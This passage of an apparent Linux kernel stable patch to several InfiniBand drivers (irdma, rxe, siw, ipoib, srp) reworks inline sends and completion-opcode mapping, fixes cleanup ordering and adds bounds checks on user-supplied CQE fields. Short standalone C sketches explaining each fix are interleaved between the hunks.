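					wqe += 16;	/* skip the next quantum's header */
					quanta_bytes_remaining = 32;
				}
			}
		}
	}

	int main(void)
	{
		uint8_t buf[96] = { 0 };
		struct sge sges[2] = {
			{ (const uint8_t *)"0123456789", 10 },
			{ (const uint8_t *)"abcdefghijklmnop", 16 },
		};

		copy_inline_gen_1(buf, sges, 2);
		/* bytes 0-15 then 32-41 carry payload; 16-31 were skipped */
		printf("%.16s | %.10s\n", buf, buf + 32);
		return 0;
	}
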
+diff --git a/drivers/infiniband/hw/irdma/user.h b/drivers/infiniband/hw/irdma/user.h
+index 2ef61923c9268..d0cdf609f5e06 100644
+--- a/drivers/infiniband/hw/irdma/user.h
++++ b/drivers/infiniband/hw/irdma/user.h
+@@ -173,14 +173,6 @@ struct irdma_post_send {
+ 	u32 ah_id;
+ };
+ 
+-struct irdma_post_inline_send {
+-	void *data;
+-	u32 len;
+-	u32 qkey;
+-	u32 dest_qp;
+-	u32 ah_id;
+-};
+-
+ struct irdma_post_rq_info {
+ 	u64 wr_id;
+ 	struct ib_sge *sg_list;
+@@ -193,12 +185,6 @@ struct irdma_rdma_write {
+ 	struct ib_sge rem_addr;
+ };
+ 
+-struct irdma_inline_rdma_write {
+-	void *data;
+-	u32 len;
+-	struct ib_sge rem_addr;
+-};
+-
+ struct irdma_rdma_read {
+ 	struct ib_sge *lo_sg_list;
+ 	u32 num_lo_sges;
+@@ -241,8 +227,6 @@ struct irdma_post_sq_info {
+ 		struct irdma_rdma_read rdma_read;
+ 		struct irdma_bind_window bind_window;
+ 		struct irdma_inv_local_stag inv_local_stag;
+-		struct irdma_inline_rdma_write inline_rdma_write;
+-		struct irdma_post_inline_send inline_send;
+ 	} op;
+ };
+ 
+@@ -261,6 +245,7 @@ struct irdma_cq_poll_info {
+ 	u16 ud_vlan;
+ 	u8 ud_smac[6];
+ 	u8 op_type;
++	u8 q_type;
+ 	bool stag_invalid_set:1; /* or L_R_Key set */
+ 	bool push_dropped:1;
+ 	bool error:1;
+@@ -291,7 +276,8 @@ int irdma_uk_stag_local_invalidate(struct irdma_qp_uk *qp,
+ 				   bool post_sq);
+ 
+ struct irdma_wqe_uk_ops {
+-	void (*iw_copy_inline_data)(u8 *dest, u8 *src, u32 len, u8 polarity);
++	void (*iw_copy_inline_data)(u8 *dest, struct ib_sge *sge_list,
++				    u32 num_sges, u8 polarity);
+ 	u16 (*iw_inline_data_size_to_quanta)(u32 data_size);
+ 	void (*iw_set_fragment)(__le64 *wqe, u32 offset, struct ib_sge *sge,
+ 				u8 valid);
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 8dfc9e154d733..445e69e864097 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -2591,6 +2591,7 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 			sw_wqe = qp->sq_base[wqe_idx].elem;
+ 			get_64bit_val(sw_wqe, 24, &wqe_qword);
+ 			cmpl->cpi.op_type = (u8)FIELD_GET(IRDMAQPSQ_OPCODE, IRDMAQPSQ_OPCODE);
++			cmpl->cpi.q_type = IRDMA_CQE_QTYPE_SQ;
+ 			/* remove the SQ WR by moving SQ tail*/
+ 			IRDMA_RING_SET_TAIL(*sq_ring,
+ 				sq_ring->tail + qp->sq_wrtrk_array[sq_ring->tail].quanta);
+@@ -2629,6 +2630,7 @@ void irdma_generate_flush_completions(struct irdma_qp *iwqp)
+ 
+ 			cmpl->cpi.wr_id = qp->rq_wrid_array[wqe_idx];
+ 			cmpl->cpi.op_type = IRDMA_OP_TYPE_REC;
++			cmpl->cpi.q_type = IRDMA_CQE_QTYPE_RQ;
+ 			/* remove the RQ WR by moving RQ tail */
+ 			IRDMA_RING_SET_TAIL(*rq_ring, rq_ring->tail + 1);
+ 			ibdev_dbg(iwqp->iwrcq->ibcq.device,
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index a22afbb25bc58..f6973ea55eda7 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -63,36 +63,6 @@ static int irdma_query_device(struct ib_device *ibdev,
+ 	return 0;
+ }
+ 
+-/**
+- * irdma_get_eth_speed_and_width - Get IB port speed and width from netdev speed
+- * @link_speed: netdev phy link speed
+- * @active_speed: IB port speed
+- * @active_width: IB port width
+- */
+-static void irdma_get_eth_speed_and_width(u32 link_speed, u16 *active_speed,
+-					  u8 *active_width)
+-{
+-	if (link_speed <= SPEED_1000) {
+-		*active_width = IB_WIDTH_1X;
+-		*active_speed = IB_SPEED_SDR;
+-	} else if (link_speed <= SPEED_10000) {
+-		*active_width = IB_WIDTH_1X;
+-		*active_speed = IB_SPEED_FDR10;
+-	} else if (link_speed <= SPEED_20000) {
+-		*active_width = IB_WIDTH_4X;
+-		*active_speed = IB_SPEED_DDR;
+-	} else if (link_speed <= SPEED_25000) {
+-		*active_width = IB_WIDTH_1X;
+-		*active_speed = IB_SPEED_EDR;
+-	} else if (link_speed <= SPEED_40000) {
+-		*active_width = IB_WIDTH_4X;
+-		*active_speed = IB_SPEED_FDR10;
+-	} else {
+-		*active_width = IB_WIDTH_4X;
+-		*active_speed = IB_SPEED_EDR;
+-	}
+-}
+-
+ /**
+  * irdma_query_port - get port attributes
+  * @ibdev: device pointer from stack
+@@ -120,8 +90,9 @@ static int irdma_query_port(struct ib_device *ibdev, u32 port,
+ 		props->state = IB_PORT_DOWN;
+ 		props->phys_state = IB_PORT_PHYS_STATE_DISABLED;
+ 	}
+-	irdma_get_eth_speed_and_width(SPEED_100000, &props->active_speed,
+-				      &props->active_width);
++
++	ib_get_eth_speed(ibdev, port, &props->active_speed,
++			 &props->active_width);
+ 
+ 	if (rdma_protocol_roce(ibdev, 1)) {
+ 		props->gid_tbl_len = 32;
+@@ -1242,6 +1213,7 @@ int irdma_modify_qp_roce(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 		av->attrs = attr->ah_attr;
+ 		rdma_gid2ip((struct sockaddr *)&av->sgid_addr, &sgid_attr->gid);
+ 		rdma_gid2ip((struct sockaddr *)&av->dgid_addr, &attr->ah_attr.grh.dgid);
++		av->net_type = rdma_gid_attr_network_type(sgid_attr);
+ 		if (av->net_type == RDMA_NETWORK_IPV6) {
+ 			__be32 *daddr =
+ 				av->dgid_addr.saddr_in6.sin6_addr.in6_u.u6_addr32;
+@@ -2358,9 +2330,10 @@ static bool irdma_check_mr_contiguous(struct irdma_pble_alloc *palloc,
+  * @rf: RDMA PCI function
+  * @iwmr: mr pointer for this memory registration
+  * @use_pbles: flag if to use pble's
++ * @lvl_1_only: request only level 1 pble if true
+  */
+ static int irdma_setup_pbles(struct irdma_pci_f *rf, struct irdma_mr *iwmr,
+-			     bool use_pbles)
++			     bool use_pbles, bool lvl_1_only)
+ {
+ 	struct irdma_pbl *iwpbl = &iwmr->iwpbl;
+ 	struct irdma_pble_alloc *palloc = &iwpbl->pble_alloc;
+@@ -2371,7 +2344,7 @@ static int irdma_setup_pbles(struct irdma_pci_f *rf, struct irdma_mr *iwmr,
+ 
+ 	if (use_pbles) {
+ 		status = irdma_get_pble(rf->pble_rsrc, palloc, iwmr->page_cnt,
+-					false);
++					lvl_1_only);
+ 		if (status)
+ 			return status;
+ 
+@@ -2414,16 +2387,10 @@ static int irdma_handle_q_mem(struct irdma_device *iwdev,
+ 	bool ret = true;
+ 
+ 	pg_size = iwmr->page_size;
+-	err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles);
++	err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles, true);
+ 	if (err)
+ 		return err;
+ 
+-	if (use_pbles && palloc->level != PBLE_LEVEL_1) {
+-		irdma_free_pble(iwdev->rf->pble_rsrc, palloc);
+-		iwpbl->pbl_allocated = false;
+-		return -ENOMEM;
+-	}
+-
+ 	if (use_pbles)
+ 		arr = palloc->level1.addr;
+ 
+@@ -2899,7 +2866,7 @@ static struct ib_mr *irdma_reg_user_mr(struct ib_pd *pd, u64 start, u64 len,
+ 	case IRDMA_MEMREG_TYPE_MEM:
+ 		use_pbles = (iwmr->page_cnt != 1);
+ 
+-		err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles);
++		err = irdma_setup_pbles(iwdev->rf, iwmr, use_pbles, false);
+ 		if (err)
+ 			goto error;
+ 
+@@ -3165,30 +3132,20 @@ static int irdma_post_send(struct ib_qp *ibqp,
+ 				info.stag_to_inv = ib_wr->ex.invalidate_rkey;
+ 			}
+ 
+-			if (ib_wr->send_flags & IB_SEND_INLINE) {
+-				info.op.inline_send.data = (void *)(unsigned long)
+-							   ib_wr->sg_list[0].addr;
+-				info.op.inline_send.len = ib_wr->sg_list[0].length;
+-				if (iwqp->ibqp.qp_type == IB_QPT_UD ||
+-				    iwqp->ibqp.qp_type == IB_QPT_GSI) {
+-					ah = to_iwah(ud_wr(ib_wr)->ah);
+-					info.op.inline_send.ah_id = ah->sc_ah.ah_info.ah_idx;
+-					info.op.inline_send.qkey = ud_wr(ib_wr)->remote_qkey;
+-					info.op.inline_send.dest_qp = ud_wr(ib_wr)->remote_qpn;
+-				}
++			info.op.send.num_sges = ib_wr->num_sge;
++			info.op.send.sg_list = ib_wr->sg_list;
++			if (iwqp->ibqp.qp_type == IB_QPT_UD ||
++			    iwqp->ibqp.qp_type == IB_QPT_GSI) {
++				ah = to_iwah(ud_wr(ib_wr)->ah);
++				info.op.send.ah_id = ah->sc_ah.ah_info.ah_idx;
++				info.op.send.qkey = ud_wr(ib_wr)->remote_qkey;
++				info.op.send.dest_qp = ud_wr(ib_wr)->remote_qpn;
++			}
++
++			if (ib_wr->send_flags & IB_SEND_INLINE)
+ 				err = irdma_uk_inline_send(ukqp, &info, false);
+-			} else {
+-				info.op.send.num_sges = ib_wr->num_sge;
+-				info.op.send.sg_list = ib_wr->sg_list;
+-				if (iwqp->ibqp.qp_type == IB_QPT_UD ||
+-				    iwqp->ibqp.qp_type == IB_QPT_GSI) {
+-					ah = to_iwah(ud_wr(ib_wr)->ah);
+-					info.op.send.ah_id = ah->sc_ah.ah_info.ah_idx;
+-					info.op.send.qkey = ud_wr(ib_wr)->remote_qkey;
+-					info.op.send.dest_qp = ud_wr(ib_wr)->remote_qpn;
+-				}
++			else
+ 				err = irdma_uk_send(ukqp, &info, false);
+-			}
+ 			break;
+ 		case IB_WR_RDMA_WRITE_WITH_IMM:
+ 			if (ukqp->qp_caps & IRDMA_WRITE_WITH_IMM) {
+@@ -3205,22 +3162,15 @@ static int irdma_post_send(struct ib_qp *ibqp,
+ 			else
+ 				info.op_type = IRDMA_OP_TYPE_RDMA_WRITE;
+ 
+-			if (ib_wr->send_flags & IB_SEND_INLINE) {
+-				info.op.inline_rdma_write.data = (void *)(uintptr_t)ib_wr->sg_list[0].addr;
+-				info.op.inline_rdma_write.len =
+-						ib_wr->sg_list[0].length;
+-				info.op.inline_rdma_write.rem_addr.addr =
+-						rdma_wr(ib_wr)->remote_addr;
+-				info.op.inline_rdma_write.rem_addr.lkey =
+-						rdma_wr(ib_wr)->rkey;
++			info.op.rdma_write.num_lo_sges = ib_wr->num_sge;
++			info.op.rdma_write.lo_sg_list = ib_wr->sg_list;
++			info.op.rdma_write.rem_addr.addr =
++				rdma_wr(ib_wr)->remote_addr;
++			info.op.rdma_write.rem_addr.lkey = rdma_wr(ib_wr)->rkey;
++			if (ib_wr->send_flags & IB_SEND_INLINE)
+ 				err = irdma_uk_inline_rdma_write(ukqp, &info, false);
+-			} else {
+-				info.op.rdma_write.lo_sg_list = (void *)ib_wr->sg_list;
+-				info.op.rdma_write.num_lo_sges = ib_wr->num_sge;
+-				info.op.rdma_write.rem_addr.addr = rdma_wr(ib_wr)->remote_addr;
+-				info.op.rdma_write.rem_addr.lkey = rdma_wr(ib_wr)->rkey;
++			else
+ 				err = irdma_uk_rdma_write(ukqp, &info, false);
+-			}
+ 			break;
+ 		case IB_WR_RDMA_READ_WITH_INV:
+ 			inv_stag = true;
+@@ -3380,7 +3330,6 @@ static enum ib_wc_status irdma_flush_err_to_ib_wc_status(enum irdma_flush_opcode
+ static void irdma_process_cqe(struct ib_wc *entry,
+ 			      struct irdma_cq_poll_info *cq_poll_info)
+ {
+-	struct irdma_qp *iwqp;
+ 	struct irdma_sc_qp *qp;
+ 
+ 	entry->wc_flags = 0;
+@@ -3388,7 +3337,6 @@ static void irdma_process_cqe(struct ib_wc *entry,
+ 	entry->wr_id = cq_poll_info->wr_id;
+ 
+ 	qp = cq_poll_info->qp_handle;
+-	iwqp = qp->qp_uk.back_qp;
+ 	entry->qp = qp->qp_uk.back_qp;
+ 
+ 	if (cq_poll_info->error) {
+@@ -3421,42 +3369,17 @@ static void irdma_process_cqe(struct ib_wc *entry,
+ 		}
+ 	}
+ 
+-	switch (cq_poll_info->op_type) {
+-	case IRDMA_OP_TYPE_RDMA_WRITE:
+-	case IRDMA_OP_TYPE_RDMA_WRITE_SOL:
+-		entry->opcode = IB_WC_RDMA_WRITE;
+-		break;
+-	case IRDMA_OP_TYPE_RDMA_READ_INV_STAG:
+-	case IRDMA_OP_TYPE_RDMA_READ:
+-		entry->opcode = IB_WC_RDMA_READ;
+-		break;
+-	case IRDMA_OP_TYPE_SEND_INV:
+-	case IRDMA_OP_TYPE_SEND_SOL:
+-	case IRDMA_OP_TYPE_SEND_SOL_INV:
+-	case IRDMA_OP_TYPE_SEND:
+-		entry->opcode = IB_WC_SEND;
+-		break;
+-	case IRDMA_OP_TYPE_FAST_REG_NSMR:
+-		entry->opcode = IB_WC_REG_MR;
+-		break;
+-	case IRDMA_OP_TYPE_INV_STAG:
+-		entry->opcode = IB_WC_LOCAL_INV;
+-		break;
+-	case IRDMA_OP_TYPE_REC_IMM:
+-	case IRDMA_OP_TYPE_REC:
+-		entry->opcode = cq_poll_info->op_type == IRDMA_OP_TYPE_REC_IMM ?
+-			IB_WC_RECV_RDMA_WITH_IMM : IB_WC_RECV;
++	if (cq_poll_info->q_type == IRDMA_CQE_QTYPE_SQ) {
++		set_ib_wc_op_sq(cq_poll_info, entry);
++	} else {
++		set_ib_wc_op_rq(cq_poll_info, entry,
++				qp->qp_uk.qp_caps & IRDMA_SEND_WITH_IMM ?
++				true : false);
+ 		if (qp->qp_uk.qp_type != IRDMA_QP_TYPE_ROCE_UD &&
+ 		    cq_poll_info->stag_invalid_set) {
+ 			entry->ex.invalidate_rkey = cq_poll_info->inv_stag;
+ 			entry->wc_flags |= IB_WC_WITH_INVALIDATE;
+ 		}
+-		break;
+-	default:
+-		ibdev_err(&iwqp->iwdev->ibdev,
+-			  "Invalid opcode = %d in CQE\n", cq_poll_info->op_type);
+-		entry->status = IB_WC_GENERAL_ERR;
+-		return;
+ 	}
+ 
+ 	if (qp->qp_uk.qp_type == IRDMA_QP_TYPE_ROCE_UD) {
+diff --git a/drivers/infiniband/hw/irdma/verbs.h b/drivers/infiniband/hw/irdma/verbs.h
+index 4309b7159f42c..a536e9fa85ebf 100644
+--- a/drivers/infiniband/hw/irdma/verbs.h
++++ b/drivers/infiniband/hw/irdma/verbs.h
+@@ -232,6 +232,59 @@ static inline u16 irdma_fw_minor_ver(struct irdma_sc_dev *dev)
+ 	return (u16)FIELD_GET(IRDMA_FW_VER_MINOR, dev->feature_info[IRDMA_FEATURE_FW_INFO]);
+ }
+ 
++static inline void set_ib_wc_op_sq(struct irdma_cq_poll_info *cq_poll_info,
++				   struct ib_wc *entry)
++{
++	switch (cq_poll_info->op_type) {
++	case IRDMA_OP_TYPE_RDMA_WRITE:
++	case IRDMA_OP_TYPE_RDMA_WRITE_SOL:
++		entry->opcode = IB_WC_RDMA_WRITE;
++		break;
++	case IRDMA_OP_TYPE_RDMA_READ_INV_STAG:
++	case IRDMA_OP_TYPE_RDMA_READ:
++		entry->opcode = IB_WC_RDMA_READ;
++		break;
++	case IRDMA_OP_TYPE_SEND_SOL:
++	case IRDMA_OP_TYPE_SEND_SOL_INV:
++	case IRDMA_OP_TYPE_SEND_INV:
++	case IRDMA_OP_TYPE_SEND:
++		entry->opcode = IB_WC_SEND;
++		break;
++	case IRDMA_OP_TYPE_FAST_REG_NSMR:
++		entry->opcode = IB_WC_REG_MR;
++		break;
++	case IRDMA_OP_TYPE_INV_STAG:
++		entry->opcode = IB_WC_LOCAL_INV;
++		break;
++	default:
++		entry->status = IB_WC_GENERAL_ERR;
++	}
++}
++
++static inline void set_ib_wc_op_rq(struct irdma_cq_poll_info *cq_poll_info,
++				   struct ib_wc *entry, bool send_imm_support)
++{
++	/*
++	 * iWARP does not support send with immediate data, so any
++	 * immediate data present must have arrived via an RDMA Write
++	 * with Immediate.
++	 */
++	if (!send_imm_support) {
++		entry->opcode = cq_poll_info->imm_valid ?
++					IB_WC_RECV_RDMA_WITH_IMM :
++					IB_WC_RECV;
++		return;
++	}
++
++	switch (cq_poll_info->op_type) {
++	case IB_OPCODE_RDMA_WRITE_ONLY_WITH_IMMEDIATE:
++	case IB_OPCODE_RDMA_WRITE_LAST_WITH_IMMEDIATE:
++		entry->opcode = IB_WC_RECV_RDMA_WITH_IMM;
++		break;
++	default:
++		entry->opcode = IB_WC_RECV;
++	}
++}
++
+ void irdma_mcast_mac(u32 *ip_addr, u8 *mac, bool ipv4);
+ int irdma_ib_register_device(struct irdma_device *iwdev);
+ void irdma_ib_unregister_device(struct irdma_device *iwdev);
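
/*
 * A minimal standalone sketch of the pattern the helpers above introduce:
 * map a provider-level op code to a consumer-visible opcode through a
 * switch, with a default arm that flags the completion instead of ever
 * indexing past a table. All names below are illustrative, not the irdma
 * API.
 */
#include <stdio.h>

enum prov_op { PROV_WRITE, PROV_READ, PROV_SEND, PROV_OP_MAX };
enum wc_op   { WC_WRITE, WC_READ, WC_SEND, WC_ERR };

static enum wc_op map_sq_op(int op)
{
	switch (op) {
	case PROV_WRITE: return WC_WRITE;
	case PROV_READ:  return WC_READ;
	case PROV_SEND:  return WC_SEND;
	default:         return WC_ERR;  /* unknown op -> error, never OOB */
	}
}

int main(void)
{
	printf("%d\n", map_sq_op(PROV_SEND));  /* 2 */
	printf("%d\n", map_sq_op(42));         /* 3 (WC_ERR) */
	return 0;
}
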
+diff --git a/drivers/infiniband/sw/rxe/rxe_mr.c b/drivers/infiniband/sw/rxe/rxe_mr.c
+index 502e9ada99b30..80e2d631fdb24 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mr.c
++++ b/drivers/infiniband/sw/rxe/rxe_mr.c
+@@ -99,6 +99,7 @@ err2:
+ 		kfree(mr->map[i]);
+ 
+ 	kfree(mr->map);
++	mr->map = NULL;
+ err1:
+ 	return -ENOMEM;
+ }
+@@ -122,7 +123,6 @@ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 	int			num_buf;
+ 	void			*vaddr;
+ 	int err;
+-	int i;
+ 
+ 	umem = ib_umem_get(&rxe->ib_dev, start, length, access);
+ 	if (IS_ERR(umem)) {
+@@ -163,9 +163,8 @@ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 				pr_warn("%s: Unable to get virtual address\n",
+ 						__func__);
+ 				err = -ENOMEM;
+-				goto err_cleanup_map;
++				goto err_release_umem;
+ 			}
+-
+ 			buf->addr = (uintptr_t)vaddr;
+ 			buf->size = PAGE_SIZE;
+ 			num_buf++;
+@@ -182,10 +181,6 @@ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 
+ 	return 0;
+ 
+-err_cleanup_map:
+-	for (i = 0; i < mr->num_map; i++)
+-		kfree(mr->map[i]);
+-	kfree(mr->map);
+ err_release_umem:
+ 	ib_umem_release(umem);
+ err_out:
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index a62bab88415cb..e459fb542b83a 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -829,12 +829,12 @@ static void rxe_qp_do_cleanup(struct work_struct *work)
+ 	if (qp->resp.mr)
+ 		rxe_put(qp->resp.mr);
+ 
+-	if (qp_type(qp) == IB_QPT_RC)
+-		sk_dst_reset(qp->sk->sk);
+-
+ 	free_rd_atomic_resources(qp);
+ 
+ 	if (qp->sk) {
++		if (qp_type(qp) == IB_QPT_RC)
++			sk_dst_reset(qp->sk->sk);
++
+ 		kernel_sock_shutdown(qp->sk, SHUT_RDWR);
+ 		sock_release(qp->sk);
+ 	}
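
/*
 * A minimal sketch of the reordering in the rxe_qp.c hunk above: state
 * hanging off an optional pointer must only be touched under that
 * pointer's NULL check. Names are illustrative, not the rxe API.
 */
#include <stdio.h>
#include <stdlib.h>

struct sock { int dst; };
struct qp { struct sock *sk; int is_rc; };

static void qp_cleanup(struct qp *qp)
{
	/* ...teardown that does not need qp->sk happens first... */
	if (qp->sk) {
		if (qp->is_rc)
			qp->sk->dst = 0;   /* safe: guarded by qp->sk */
		free(qp->sk);
		qp->sk = NULL;
	}
}

int main(void)
{
	struct qp a = { .sk = NULL, .is_rc = 1 };  /* must not crash */
	qp_cleanup(&a);
	puts("ok");
	return 0;
}
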
+diff --git a/drivers/infiniband/sw/siw/siw_cq.c b/drivers/infiniband/sw/siw/siw_cq.c
+index d68e37859e73b..403029de6b92d 100644
+--- a/drivers/infiniband/sw/siw/siw_cq.c
++++ b/drivers/infiniband/sw/siw/siw_cq.c
+@@ -56,8 +56,6 @@ int siw_reap_cqe(struct siw_cq *cq, struct ib_wc *wc)
+ 	if (READ_ONCE(cqe->flags) & SIW_WQE_VALID) {
+ 		memset(wc, 0, sizeof(*wc));
+ 		wc->wr_id = cqe->id;
+-		wc->status = map_cqe_status[cqe->status].ib;
+-		wc->opcode = map_wc_opcode[cqe->opcode];
+ 		wc->byte_len = cqe->bytes;
+ 
+ 		/*
+@@ -71,10 +69,32 @@ int siw_reap_cqe(struct siw_cq *cq, struct ib_wc *wc)
+ 				wc->wc_flags = IB_WC_WITH_INVALIDATE;
+ 			}
+ 			wc->qp = cqe->base_qp;
++			wc->opcode = map_wc_opcode[cqe->opcode];
++			wc->status = map_cqe_status[cqe->status].ib;
+ 			siw_dbg_cq(cq,
+ 				   "idx %u, type %d, flags %2x, id 0x%pK\n",
+ 				   cq->cq_get % cq->num_cqe, cqe->opcode,
+ 				   cqe->flags, (void *)(uintptr_t)cqe->id);
++		} else {
++			/*
++			 * A malicious user may set invalid opcode or
++			 * status in the user mmapped CQE array.
++			 * Sanity check and correct values in that case
++			 * to avoid out-of-bounds access to global arrays
++			 * for opcode and status mapping.
++			 */
++			u8 opcode = cqe->opcode;
++			u16 status = cqe->status;
++
++			if (opcode >= SIW_NUM_OPCODES) {
++				opcode = 0;
++				status = SIW_WC_GENERAL_ERR;
++			} else if (status >= SIW_NUM_WC_STATUS) {
++				status = SIW_WC_GENERAL_ERR;
++			}
++			wc->opcode = map_wc_opcode[opcode];
++			wc->status = map_cqe_status[status].ib;
++
+ 		}
+ 		WRITE_ONCE(cqe->flags, 0);
+ 		cq->cq_get++;
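
/*
 * Standalone model of the bounds check added above: indices read from
 * user-shared memory are validated before they index a global mapping
 * table, and out-of-range values collapse to a generic error. Table
 * contents and names are illustrative, not the siw arrays.
 */
#include <stdio.h>

#define NUM_OPCODES 3
#define NUM_STATUS  4
#define STATUS_GENERAL_ERR 3

static const int map_opcode[NUM_OPCODES] = { 10, 11, 12 };
static const int map_status[NUM_STATUS]  = { 0, 1, 2, 99 };

static void reap(unsigned int opcode, unsigned int status, int *op, int *st)
{
	if (opcode >= NUM_OPCODES) {      /* untrusted: clamp both */
		opcode = 0;
		status = STATUS_GENERAL_ERR;
	} else if (status >= NUM_STATUS) {
		status = STATUS_GENERAL_ERR;
	}
	*op = map_opcode[opcode];
	*st = map_status[status];
}

int main(void)
{
	int op, st;

	reap(200, 7, &op, &st);           /* hostile input */
	printf("op=%d st=%d\n", op, st);  /* op=10 st=99, no OOB read */
	return 0;
}
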
+diff --git a/drivers/infiniband/sw/siw/siw_qp_tx.c b/drivers/infiniband/sw/siw/siw_qp_tx.c
+index 7d47b521070b1..05052b49107f2 100644
+--- a/drivers/infiniband/sw/siw/siw_qp_tx.c
++++ b/drivers/infiniband/sw/siw/siw_qp_tx.c
+@@ -29,7 +29,7 @@ static struct page *siw_get_pblpage(struct siw_mem *mem, u64 addr, int *idx)
+ 	dma_addr_t paddr = siw_pbl_get_buffer(pbl, offset, NULL, idx);
+ 
+ 	if (paddr)
+-		return virt_to_page((void *)paddr);
++		return virt_to_page((void *)(uintptr_t)paddr);
+ 
+ 	return NULL;
+ }
+diff --git a/drivers/infiniband/sw/siw/siw_verbs.c b/drivers/infiniband/sw/siw/siw_verbs.c
+index 3e814cfb298cf..906fde1a2a0de 100644
+--- a/drivers/infiniband/sw/siw/siw_verbs.c
++++ b/drivers/infiniband/sw/siw/siw_verbs.c
+@@ -676,13 +676,45 @@ static int siw_copy_inline_sgl(const struct ib_send_wr *core_wr,
+ static int siw_sq_flush_wr(struct siw_qp *qp, const struct ib_send_wr *wr,
+ 			   const struct ib_send_wr **bad_wr)
+ {
+-	struct siw_sqe sqe = {};
+ 	int rv = 0;
+ 
+ 	while (wr) {
+-		sqe.id = wr->wr_id;
+-		sqe.opcode = wr->opcode;
+-		rv = siw_sqe_complete(qp, &sqe, 0, SIW_WC_WR_FLUSH_ERR);
++		struct siw_sqe sqe = {};
++
++		switch (wr->opcode) {
++		case IB_WR_RDMA_WRITE:
++			sqe.opcode = SIW_OP_WRITE;
++			break;
++		case IB_WR_RDMA_READ:
++			sqe.opcode = SIW_OP_READ;
++			break;
++		case IB_WR_RDMA_READ_WITH_INV:
++			sqe.opcode = SIW_OP_READ_LOCAL_INV;
++			break;
++		case IB_WR_SEND:
++			sqe.opcode = SIW_OP_SEND;
++			break;
++		case IB_WR_SEND_WITH_IMM:
++			sqe.opcode = SIW_OP_SEND_WITH_IMM;
++			break;
++		case IB_WR_SEND_WITH_INV:
++			sqe.opcode = SIW_OP_SEND_REMOTE_INV;
++			break;
++		case IB_WR_LOCAL_INV:
++			sqe.opcode = SIW_OP_INVAL_STAG;
++			break;
++		case IB_WR_REG_MR:
++			sqe.opcode = SIW_OP_REG_MR;
++			break;
++		default:
++			rv = -EINVAL;
++			break;
++		}
++		if (!rv) {
++			sqe.id = wr->wr_id;
++			rv = siw_sqe_complete(qp, &sqe, 0,
++					      SIW_WC_WR_FLUSH_ERR);
++		}
+ 		if (rv) {
+ 			if (bad_wr)
+ 				*bad_wr = wr;
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_netlink.c b/drivers/infiniband/ulp/ipoib/ipoib_netlink.c
+index ea16ba5d8da6c..9ad8d98562752 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_netlink.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_netlink.c
+@@ -41,6 +41,11 @@ static const struct nla_policy ipoib_policy[IFLA_IPOIB_MAX + 1] = {
+ 	[IFLA_IPOIB_UMCAST]	= { .type = NLA_U16 },
+ };
+ 
++static unsigned int ipoib_get_max_num_queues(void)
++{
++	return min_t(unsigned int, num_possible_cpus(), 128);
++}
++
+ static int ipoib_fill_info(struct sk_buff *skb, const struct net_device *dev)
+ {
+ 	struct ipoib_dev_priv *priv = ipoib_priv(dev);
+@@ -172,6 +177,8 @@ static struct rtnl_link_ops ipoib_link_ops __read_mostly = {
+ 	.changelink	= ipoib_changelink,
+ 	.get_size	= ipoib_get_size,
+ 	.fill_info	= ipoib_fill_info,
++	.get_num_rx_queues = ipoib_get_max_num_queues,
++	.get_num_tx_queues = ipoib_get_max_num_queues,
+ };
+ 
+ struct rtnl_link_ops *ipoib_get_link_ops(void)
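
/*
 * The new get_num_{rx,tx}_queues callbacks above just cap the queue count
 * at min(possible CPUs, 128). The same clamp in portable C as a sketch;
 * 128 is the cap the patch picks, and sysconf() stands in here for the
 * kernel's num_possible_cpus().
 */
#include <stdio.h>
#include <unistd.h>

static unsigned int max_num_queues(void)
{
	long cpus = sysconf(_SC_NPROCESSORS_CONF);

	if (cpus < 1)
		cpus = 1;
	return cpus < 128 ? (unsigned int)cpus : 128u;
}

int main(void)
{
	printf("queues: %u\n", max_num_queues());
	return 0;
}
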
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.c b/drivers/infiniband/ulp/srp/ib_srp.c
+index 1075c2ac8fe20..b4d6a4a5ae81e 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.c
++++ b/drivers/infiniband/ulp/srp/ib_srp.c
+@@ -3410,7 +3410,8 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_PKEY:
+-			if (match_hex(args, &token)) {
++			ret = match_hex(args, &token);
++			if (ret) {
+ 				pr_warn("bad P_Key parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3470,7 +3471,8 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_MAX_SECT:
+-			if (match_int(args, &token)) {
++			ret = match_int(args, &token);
++			if (ret) {
+ 				pr_warn("bad max sect parameter '%s'\n", p);
+ 				goto out;
+ 			}
+@@ -3478,8 +3480,15 @@ static int srp_parse_options(struct net *net, const char *buf,
+ 			break;
+ 
+ 		case SRP_OPT_QUEUE_SIZE:
+-			if (match_int(args, &token) || token < 1) {
++			ret = match_int(args, &token);
++			if (ret) {
++				pr_warn("match_int() failed for queue_size parameter '%s', Error %d\n",
++					p, ret);
++				goto out;
++			}
++			if (token < 1) {
+ 				pr_warn("bad queue_size parameter '%s'\n", p);
++				ret = -EINVAL;
+ 				goto out;
+ 			}
